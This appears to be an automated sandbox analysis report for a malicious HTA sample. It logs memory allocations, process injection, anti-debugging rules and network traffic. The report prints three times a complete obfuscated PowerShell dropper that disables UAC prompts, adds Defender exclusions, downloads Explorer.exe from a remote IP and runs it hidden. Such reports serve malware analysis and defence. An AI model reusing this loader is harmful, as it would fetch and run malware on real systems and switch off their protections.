NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02565000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02566000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02583000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02584000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02585000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02586000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02588000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02589000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a57000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a59000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a5a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a5d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a5e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a5f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell.exe -ExecutionPolicy UnRestricted function vVvjPjftuBpios($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym){[IO.File]::WriteAllBytes($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym)};function YCRqlDfp($iDogYbJVrauoYHt){if($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73402,73410,73410))) -eq $True){rundll32.exe $iDogYbJVrauoYHt }elseif($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73414,73417,73351))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iDogYbJVrauoYHt}elseif($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73411,73417,73407))) -eq $True){misexec /qn /i $iDogYbJVrauoYHt}else{Start-Process $iDogYbJVrauoYHt}};function yrxXGaHYxljOAHilOnp($vVvjPjftuBpios){$dQtvvTIRLvmkOoGu=(rUZdUobLXAfzKyLERv @(73374,73407,73402,73402,73403,73412));$tMkldNaRfWU=(Get-ChildItem $vVvjPjftuBpios -Force);$tMkldNaRfWU.Attributes=$tMkldNaRfWU.Attributes -bor ([IO.FileAttributes]$dQtvvTIRLvmkOoGu).value__};function UbnAGDtoWmGRHMWp($sIOnmedZDDmzbaqMY){$piDBrOWjfSpEFsTcUFCq = New-Object (rUZdUobLXAfzKyLERv @(73380,73403,73418,73348,73389,73403,73400,73369,73410,73407,73403,73412,73418));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$PCfkdoRHTEkbDRym = $piDBrOWjfSpEFsTcUFCq.DownloadData($sIOnmedZDDmzbaqMY);return $PCfkdoRHTEkbDRym};function rUZdUobLXAfzKyLERv($dJpyOwCQuNvvus){$SdToBurDGMn=73302;$VxLTWGUn=$Null;foreach($VugtEnu in $dJpyOwCQuNvvus){$VxLTWGUn+=[char]($VugtEnu-$SdToBurDGMn)};return $VxLTWGUn};function LFpSWuJMZqJ(){$gDIyZDdKs = $env:Temp + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$DqPtwnqSlxilGJt=$env:Temp; Add-MpPreference -ExclusionPath $DqPtwnqSlxilGJt;Add-MpPreference -ExclusionExtension ?lnk?;$bWhkJyOqWMVrLJ = $gDIyZDdKs + 'Explorer.exe'; if (Test-Path -Path $bWhkJyOqWMVrLJ){YCRqlDfp $bWhkJyOqWMVrLJ;}Else{ $hEDDEUJiAbfkEXH = UbnAGDtoWmGRHMWp (rUZdUobLXAfzKyLERv @(73406,73418,73418,73414,73360,73349,73349,73351,73353,73359,73348,73359,73359,73348,73351,73351,73354,73348,73351,73355,73351,73349,73404,73407,73410,73403,73349,73371,73422,73414,73410,73413,73416,73403,73416,73348,73403,73422,73403));vVvjPjftuBpios $bWhkJyOqWMVrLJ $hEDDEUJiAbfkEXH;YCRqlDfp $bWhkJyOqWMVrLJ;};yrxXGaHYxljOAHilOnp $bWhkJyOqWMVrLJ;;;;;}LFpSWuJMZqJ;" uac

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function vVvjPjftuBpios($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym){[IO.File]::WriteAllBytes($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym)};function YCRqlDfp($iDogYbJVrauoYHt){if($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73402,73410,73410))) -eq $True){rundll32.exe $iDogYbJVrauoYHt }elseif($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73414,73417,73351))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iDogYbJVrauoYHt}elseif($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73411,73417,73407))) -eq $True){misexec /qn /i $iDogYbJVrauoYHt}else{Start-Process $iDogYbJVrauoYHt}};function yrxXGaHYxljOAHilOnp($vVvjPjftuBpios){$dQtvvTIRLvmkOoGu=(rUZdUobLXAfzKyLERv @(73374,73407,73402,73402,73403,73412));$tMkldNaRfWU=(Get-ChildItem $vVvjPjftuBpios -Force);$tMkldNaRfWU.Attributes=$tMkldNaRfWU.Attributes -bor ([IO.FileAttributes]$dQtvvTIRLvmkOoGu).value__};function UbnAGDtoWmGRHMWp($sIOnmedZDDmzbaqMY){$piDBrOWjfSpEFsTcUFCq = New-Object (rUZdUobLXAfzKyLERv @(73380,73403,73418,73348,73389,73403,73400,73369,73410,73407,73403,73412,73418));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$PCfkdoRHTEkbDRym = $piDBrOWjfSpEFsTcUFCq.DownloadData($sIOnmedZDDmzbaqMY);return $PCfkdoRHTEkbDRym};function rUZdUobLXAfzKyLERv($dJpyOwCQuNvvus){$SdToBurDGMn=73302;$VxLTWGUn=$Null;foreach($VugtEnu in $dJpyOwCQuNvvus){$VxLTWGUn+=[char]($VugtEnu-$SdToBurDGMn)};return $VxLTWGUn};function LFpSWuJMZqJ(){$gDIyZDdKs = $env:Temp + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$DqPtwnqSlxilGJt=$env:Temp; Add-MpPreference -ExclusionPath $DqPtwnqSlxilGJt;Add-MpPreference -ExclusionExtension ?lnk?;$bWhkJyOqWMVrLJ = $gDIyZDdKs + 'Explorer.exe'; if (Test-Path -Path $bWhkJyOqWMVrLJ){YCRqlDfp $bWhkJyOqWMVrLJ;}Else{ $hEDDEUJiAbfkEXH = UbnAGDtoWmGRHMWp (rUZdUobLXAfzKyLERv @(73406,73418,73418,73414,73360,73349,73349,73351,73353,73359,73348,73359,73359,73348,73351,73351,73354,73348,73351,73355,73351,73349,73404,73407,73410,73403,73349,73371,73422,73414,73410,73413,73416,73403,73416,73348,73403,73422,73403));vVvjPjftuBpios $bWhkJyOqWMVrLJ $hEDDEUJiAbfkEXH;YCRqlDfp $bWhkJyOqWMVrLJ;};yrxXGaHYxljOAHilOnp $bWhkJyOqWMVrLJ;;;;;}LFpSWuJMZqJ;" uac

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Jan. 13, 2024, 7:16 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function vVvjPjftuBpios($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym){[IO.File]::WriteAllBytes($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym)};function YCRqlDfp($iDogYbJVrauoYHt){if($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73402,73410,73410))) -eq $True){rundll32.exe $iDogYbJVrauoYHt }elseif($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73414,73417,73351))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iDogYbJVrauoYHt}elseif($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73411,73417,73407))) -eq $True){misexec /qn /i $iDogYbJVrauoYHt}else{Start-Process $iDogYbJVrauoYHt}};function yrxXGaHYxljOAHilOnp($vVvjPjftuBpios){$dQtvvTIRLvmkOoGu=(rUZdUobLXAfzKyLERv @(73374,73407,73402,73402,73403,73412));$tMkldNaRfWU=(Get-ChildItem $vVvjPjftuBpios -Force);$tMkldNaRfWU.Attributes=$tMkldNaRfWU.Attributes -bor ([IO.FileAttributes]$dQtvvTIRLvmkOoGu).value__};function UbnAGDtoWmGRHMWp($sIOnmedZDDmzbaqMY){$piDBrOWjfSpEFsTcUFCq = New-Object (rUZdUobLXAfzKyLERv @(73380,73403,73418,73348,73389,73403,73400,73369,73410,73407,73403,73412,73418));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$PCfkdoRHTEkbDRym = $piDBrOWjfSpEFsTcUFCq.DownloadData($sIOnmedZDDmzbaqMY);return $PCfkdoRHTEkbDRym};function rUZdUobLXAfzKyLERv($dJpyOwCQuNvvus){$SdToBurDGMn=73302;$VxLTWGUn=$Null;foreach($VugtEnu in $dJpyOwCQuNvvus){$VxLTWGUn+=[char]($VugtEnu-$SdToBurDGMn)};return $VxLTWGUn};function LFpSWuJMZqJ(){$gDIyZDdKs = $env:Temp + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$DqPtwnqSlxilGJt=$env:Temp; Add-MpPreference -ExclusionPath $DqPtwnqSlxilGJt;Add-MpPreference -ExclusionExtension ?lnk?;$bWhkJyOqWMVrLJ = $gDIyZDdKs + 'Explorer.exe'; if (Test-Path -Path $bWhkJyOqWMVrLJ){YCRqlDfp $bWhkJyOqWMVrLJ;}Else{ $hEDDEUJiAbfkEXH = UbnAGDtoWmGRHMWp (rUZdUobLXAfzKyLERv @(73406,73418,73418,73414,73360,73349,73349,73351,73353,73359,73348,73359,73359,73348,73351,73351,73354,73348,73351,73355,73351,73349,73404,73407,73410,73403,73349,73371,73422,73414,73410,73413,73416,73403,73416,73348,73403,73422,73403));vVvjPjftuBpios $bWhkJyOqWMVrLJ $hEDDEUJiAbfkEXH;YCRqlDfp $bWhkJyOqWMVrLJ;};yrxXGaHYxljOAHilOnp $bWhkJyOqWMVrLJ;;;;;}LFpSWuJMZqJ;" uac filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Jan. 13, 2024, 7:16 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (1 event)

Data received

HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 Date: Sat, 13 Jan 2024 10:37:36 GMT Content-Length: 1245 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css">  </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>

Poweshell is sending data to a remote host (1 event)

Data sent

GET /file/Explorer.exe HTTP/1.1 Host: 139.99.114.151 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 13, 2024, 7:16 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

Communicates with host for which no DNS query was performed (1 event)

host

139.99.114.151

Attempts to modify UAC prompt behavior (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Jan. 13, 2024, 7:16 p.m.	buffer: GET /file/Explorer.exe HTTP/1.1 Host: 139.99.114.151 Connection: Keep-Alive socket: 1312 sent: 81	1	81	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

C:\Users\test22\AppData\Local\Temp\Explorer.exe

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 508 resumed a thread in remote process 2072
NtResumeThread Jan. 13, 2024, 7:16 p.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 2072	1	0	0

Created a process named as a common system process (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Jan. 13, 2024, 7:16 p.m.	show_type: 1 filepath_r: C:\Users\test22\AppData\Local\Temp\Explorer.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\Explorer.exe		0	0

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

hhh.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All